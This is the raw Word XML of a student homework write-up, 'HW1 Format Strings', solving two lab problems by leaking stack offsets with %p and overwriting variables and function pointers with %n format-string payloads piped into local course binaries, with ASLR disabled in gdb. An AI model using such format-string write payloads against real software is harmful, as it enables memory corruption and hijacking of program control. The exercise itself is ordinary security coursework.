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8A3E7" w14:textId="4781E26F" w:rsidR="00193E15" w:rsidRDefault="009D6644">
      <w:r>
        <w:t>HW1 Format Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8160E0" w14:textId="77777777" w:rsidR="009D6644" w:rsidRDefault="009D6644"/>
    <w:p w14:paraId="00A0912C" w14:textId="68481B11" w:rsidR="009D6644" w:rsidRDefault="009D6644">
      <w:r>
        <w:t>Problem 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBF2DDE" w14:textId="77777777" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ensure ASLR is turned off (‘set disable-randomization on’ in gdb).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E57DDF4" w14:textId="62775898" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compile and load file in gdb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D4C325" w14:textId="15EB27E6" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set breakpoint after buffer fetched in fgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1803FAF7" w14:textId="0CFA5517" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Print addresses of int a (</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6644">
        <w:t>0x433fa0</w:t>
      </w:r>
      <w:r>
        <w:t>) and b (</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6644">
        <w:t>0x433fa4</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7BB58" w14:textId="6D312D72" w:rsidR="009D6644" w:rsidRDefault="00F43D64" w:rsidP="00F43D64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1411BCD1" wp14:editId="7893933B">
            <wp:extent cx="5773303" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="213407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076443" name="Picture 2134076443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72" t="90691" r="18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131" cy="847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5A3465" w14:textId="22CF3362" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create payload to find offset of a and b in stack (10 p’s)</w:t>
      </w:r>
      <w:r w:rsidR="00EE1488">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C352435" w14:textId="4ACCA367" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6644">
        <w:t>python -c 'from struct import pack; print "%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p" + pack("&lt;Q", 0x433fa0) + pack("&lt;Q", 0x433fa4)' | ./HW1format1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66529ED3" w14:textId="54962B1B" w:rsidR="009D6644" w:rsidRPr="009D6644" w:rsidRDefault="00F43D64" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20008373" wp14:editId="726C1BDD">
            <wp:extent cx="5842635" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="15857914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1431" name="Picture 158579143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4" b="88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395" cy="6487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92174" w14:textId="404E7FA1" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set a to 16, b to 16 + 32 = 48, total of 64. Determine offset in final payload based on length of first payload buffer (4 bytes), final payload buffer (3 bytes), and offset in first payload buffer (10 p’s): 10 – 4 + 3 = offset of 9. Final payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B30C17" w14:textId="5CEF5719" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6644">
        <w:t>python -c 'from struct import pack; print "%16c%9$n%32c%10$n......." + pack("&lt;Q", 0x433fa0) + pack("&lt;Q", 0x433fa4)' | ./HW1format1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C704630" w14:textId="4C6E5DB4" w:rsidR="00F43D64" w:rsidRDefault="00F43D64" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="410D9483" wp14:editId="3E64EA19">
            <wp:extent cx="5842635" cy="723866"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="891914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91431" name="Picture 158579143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4" t="10871" b="76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395" cy="725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1D9967" w14:textId="2A9ADC47" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644"/>
    <w:p w14:paraId="42D8748D" w14:textId="77777777" w:rsidR="006679C3" w:rsidRDefault="006679C3" w:rsidP="009D6644"/>
    <w:p w14:paraId="578E16FE" w14:textId="77777777" w:rsidR="006679C3" w:rsidRDefault="006679C3" w:rsidP="009D6644"/>
    <w:p w14:paraId="1A9ACC64" w14:textId="77777777" w:rsidR="006679C3" w:rsidRDefault="006679C3" w:rsidP="009D6644"/>
    <w:p w14:paraId="713D90CA" w14:textId="77777777" w:rsidR="006679C3" w:rsidRDefault="006679C3" w:rsidP="009D6644"/>
    <w:p w14:paraId="3215D4CC" w14:textId="77777777" w:rsidR="006679C3" w:rsidRDefault="006679C3" w:rsidP="009D6644"/>
    <w:p w14:paraId="04A0DB92" w14:textId="77777777" w:rsidR="006679C3" w:rsidRDefault="006679C3" w:rsidP="009D6644"/>
    <w:p w14:paraId="5EDA07AA" w14:textId="0A91561A" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Problem 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E65FC1D" w14:textId="77777777" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ensure ASLR is turned off (‘set disable-randomization on’ in gdb).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2985E616" w14:textId="77777777" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compile and load file in gdb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8B615" w14:textId="0C3CE07E" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set breakpoint </w:t>
      </w:r>
      <w:r w:rsidR="00F95960">
        <w:t>after fp1, fp2, func1(), and func2() are defined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE968D5" w14:textId="4C6ACBA3" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="00620DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Print addresses of </w:t>
      </w:r>
      <w:r>
        <w:t>func1 (</w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>401142</w:t>
      </w:r>
      <w:r>
        <w:t>), func2 (</w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>401155</w:t>
      </w:r>
      <w:r>
        <w:t>), fp1 (</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6644">
        <w:t>0x403480</w:t>
      </w:r>
      <w:r>
        <w:t>), and fp2 (</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6644">
        <w:t>0x403488</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8EA7C2" w14:textId="43748469" w:rsidR="00620DA6" w:rsidRDefault="006679C3" w:rsidP="00620DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F14B650" wp14:editId="57BC2406">
            <wp:extent cx="5946550" cy="1097280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="2629381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38133" name="Picture 262938133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44" t="8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005" cy="10982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678CD9" w14:textId="7466B233" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create payload to find offset of </w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>fp1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>fp2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in stack (</w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> p’s)</w:t>
      </w:r>
      <w:r w:rsidR="00EE1488">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCB463" w14:textId="0AE82F23" w:rsidR="009D6644" w:rsidRDefault="00620DA6" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00620DA6">
        <w:t>python -c 'from struct import pack; print "%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.." + pack("&lt;Q", 0x403480) + pack("&lt;Q", 0x403488)' | ./HW1format2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FAB3C5" w14:textId="7ED76AAB" w:rsidR="00620DA6" w:rsidRPr="009D6644" w:rsidRDefault="00EE1488" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29240B2C" wp14:editId="0E447C71">
            <wp:extent cx="5943600" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1821528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8121" name="Picture 182152812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t="24338" b="70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E8ED8" w14:textId="77777777" w:rsidR="00620DA6" w:rsidRDefault="009D6644" w:rsidP="00620DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>fp1 value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>func1 address in decimal (</w:t>
      </w:r>
      <w:r w:rsidR="00620DA6" w:rsidRPr="00620DA6">
        <w:t>4198722</w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>fp2 value to func2 address – func1 address in decimal (19)</w:t>
      </w:r>
      <w:r>
        <w:t>. Determine offset in final payload based on length of first payload buffer (</w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bytes), final payload buffer (3 bytes), and offset in first payload buffer (1</w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> p’s): 1</w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + 3 = offset of</w:t>
      </w:r>
      <w:r w:rsidR="00620DA6">
        <w:t xml:space="preserve"> 11</w:t>
      </w:r>
      <w:r>
        <w:t>. Final payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8BEC92" w14:textId="54D63308" w:rsidR="009D6644" w:rsidRDefault="00620DA6" w:rsidP="00F95960">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00620DA6">
        <w:t>python -c 'from struct import pack; print "%4198722c%11$n%19c%12$n." + pack("&lt;Q", 0x403480) + pack("&lt;Q", 0x403488)' | ./HW1format2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C27968" w14:textId="3300B28D" w:rsidR="00620DA6" w:rsidRDefault="00EE1488" w:rsidP="009D6644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCE92A1" wp14:editId="5BDC084C">
            <wp:extent cx="5869822" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13008946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94684" name="Picture 130089468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00" t="84799" r="6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202" cy="1033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DFF2A" w14:textId="77777777" w:rsidR="009D6644" w:rsidRDefault="009D6644" w:rsidP="009D6644"/>
    <w:sectPr w:rsidR="009D66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5464D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E66EC7E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4368B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E66EC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1201ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B58E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534156">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2104260361">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1157722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3A9"/>
    <w:rsid w:val="00193E15"/>
    <w:rsid w:val="004C46D8"/>
    <w:rsid w:val="004E56D9"/>
    <w:rsid w:val="00620DA6"/>
    <w:rsid w:val="006679C3"/>
    <w:rsid w:val="009D6644"/>
    <w:rsid w:val="00B57BF7"/>
    <w:rsid w:val="00C113A9"/>
    <w:rsid w:val="00EE1488"/>
    <w:rsid w:val="00F43D64"/>
    <w:rsid w:val="00F95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AF217"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2B13FD12-238B-46C4-B04E-847C5867B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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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Holcomb</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>John Holcomb</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-29T21:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-29T22:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>